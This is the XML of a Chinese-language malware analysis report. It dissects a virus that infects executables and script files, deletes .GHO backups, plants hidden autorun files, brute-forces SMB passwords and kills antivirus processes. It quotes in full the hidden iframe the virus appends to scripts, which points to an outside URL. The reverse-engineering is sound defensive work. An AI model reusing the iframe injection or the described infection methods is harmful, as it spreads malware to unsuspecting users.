          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F96FE1" wp14:editId="4345EFD1">
            <wp:extent cx="5278120" cy="32708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BDC" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC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每个目录下创建.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件 并写入当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEED081" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0E001C" wp14:editId="4D27348C">
            <wp:extent cx="5278120" cy="27895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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归扫描全盘 删除.</w:t>
      </w:r>
      <w:r>
        <w:t>GHO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1DDCD" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRPr="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7417BACB" wp14:editId="4D65F914">
            <wp:extent cx="5278120" cy="26562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C6EF" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1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判断后缀 根据不同的后缀采用不同的感染方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA80EA" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C114D81" wp14:editId="1ED73484">
            <wp:extent cx="5278120" cy="4244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C6E" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41067FF3" wp14:editId="31675882">
            <wp:extent cx="5278120" cy="4297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CD03" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说 感染方式分为两种</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5B6A6" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1：二进制文件感染</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将目标文件的P</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式修改为 病毒文件+源文件+文件大小 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705CA783" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64BB34C9" wp14:editId="7CE500BF">
            <wp:extent cx="5278120" cy="32124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90C" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785A97A5" wp14:editId="46788350">
            <wp:extent cx="5278120" cy="29825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B80" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1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脚本文件感染 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F94AF" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18525CF8" wp14:editId="2AC565D2">
            <wp:extent cx="5278120" cy="19132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C67B" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二种感染方式相对简单的多 就是在脚本文件末尾追加一段网址:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3F1C">
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE3F1C">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE3F1C">
        <w:t>=http://www.ac86.cn/66/index.htm width="0" height="0"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当用户打开脚本文件时 </w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会隐藏式地开一个网址 由于网址已经废弃 所以我也不知道会发生什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54262C68" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="00DE3F1C" w:rsidP="00DE3F1C">
      <w:r>
        <w:t>至此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>第一个线程回调分析完毕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578275CF" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C"/>
    <w:p w14:paraId="42EE72D8" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="005F497D">
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时器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详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8B0D8" w14:textId="77777777" w:rsidR="00DE3F1C" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发时间:</w:t>
      </w:r>
      <w:r>
        <w:t>每隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>秒触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58652948" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:t>回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>调函数</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>行为</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>查找所有可用磁盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED8EB1" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71DFE6F4" wp14:editId="35AC0B4A">
            <wp:extent cx="5278120" cy="31165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67B" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:t>回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>调函数行为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:确保磁盘根目录下存在一个s</w:t>
      </w:r>
      <w:r>
        <w:t>etup.exe和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>并设置属性为只读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA1CFC8" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2439D80C" wp14:editId="5A2206BF">
            <wp:extent cx="5278120" cy="22548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FFD" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6669A4AD" wp14:editId="7DDF7223">
            <wp:extent cx="5278120" cy="20173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AFED" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:t>回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>调函数行为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:往</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件里写入几条批处理命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>让setup.exe开机自启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CEA0C" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="002A9B22" wp14:editId="7D8E28E9">
            <wp:extent cx="5278120" cy="20186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84C1" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C">
      <w:r>
        <w:t>至此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>整个定时器回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>调函数分析</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>完毕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20DB5F" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="00DE3F1C"/>
    <w:p w14:paraId="4A8C9DB5" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="005F497D">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>局域网感染函数详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B0C90" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C47060" wp14:editId="7817F328">
            <wp:extent cx="5278120" cy="38112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A1B0" w14:textId="77777777" w:rsidR="005F497D" w:rsidRDefault="005F497D" w:rsidP="005F497D">
      <w:r>
        <w:t>开启死循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>尝试连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>45和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>39端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>如果连接成功就尝试用管理员弱密码爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE0D1AD" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="005F497D">
      <w:r>
        <w:t>第二个关键函数行为总结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8B38A" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D82F08" wp14:editId="05911629">
            <wp:extent cx="5278120" cy="1849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8DF" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.2.4第三个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>all 病毒的自我保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65BE48" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:t>主逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D419DA3" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0BC49D" wp14:editId="20828AD6">
            <wp:extent cx="5278120" cy="11087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2A6" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:t>创建了六个定时器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>下面详解每一个定时器回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C30920" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE"/>
    <w:p w14:paraId="56421420" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:t>定时器</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AE113" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B14F860" wp14:editId="7E896365">
            <wp:extent cx="5278120" cy="14522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A62" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BE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创建线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD628D" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>改写注册表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7AAC4A" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:t>下面分析这个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>线程回调函</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79307077" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BE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关闭下列杀毒软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52578069" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BE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模拟键盘按键关闭两个窗口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E62DAA" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>结束下列进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76728D59" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B728CD" wp14:editId="48A53E47">
            <wp:extent cx="5278120" cy="31610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130" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="065302BD" wp14:editId="399CB113">
            <wp:extent cx="5278120" cy="41560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09A" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE"/>
    <w:p w14:paraId="4F80F655" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B420A61" wp14:editId="3F951B55">
            <wp:extent cx="5278120" cy="23520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F22C" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="00942BEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56465B87" wp14:editId="6432271A">
            <wp:extent cx="5152381" cy="524761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CE9" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73130136" wp14:editId="3B225C9E">
            <wp:extent cx="4038095" cy="5190476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790F" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时器二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50351C60" w14:textId="77777777" w:rsidR="00942BEE" w:rsidRDefault="00942BEE" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3047F7BC" wp14:editId="53F7B512">
            <wp:extent cx="5278120" cy="32061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652" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60EA6235" wp14:editId="1AC66FF6">
            <wp:extent cx="5278120" cy="33026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A4B" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>定时器二行为：解密网页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>从网站上下载脚本文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>使用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命令隐藏执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFA30E" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D"/>
    <w:p w14:paraId="340F38B0" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>定时器三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE814B" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C1E8A3" wp14:editId="2F069EDD">
            <wp:extent cx="5278120" cy="125285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D6B" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>创建了两个线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>关闭了一个定时器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>关闭定时器函数直接忽略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>下面分析两个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>线程回调函</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AED2C" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>线程回调</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40799FE1" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C096279" wp14:editId="7F137BCB">
            <wp:extent cx="5278120" cy="33096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DFD" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298111A9" wp14:editId="578F3E0F">
            <wp:extent cx="5278120" cy="33655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8ED1" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>进去之后发现和第二个定时器一模一样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>直接跳过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAED2B2" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>线程回调二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5F0B8" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4CB219" wp14:editId="72592B17">
            <wp:extent cx="5278120" cy="166878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F00" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D">
      <w:r>
        <w:t>这个函数的重点在于两条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命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>这两条命令的含义是删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>盘的网络共享</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>取消系统根目录的共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C3C18" w14:textId="77777777" w:rsidR="00D21A3F" w:rsidRDefault="00D21A3F" w:rsidP="005F497D"/>
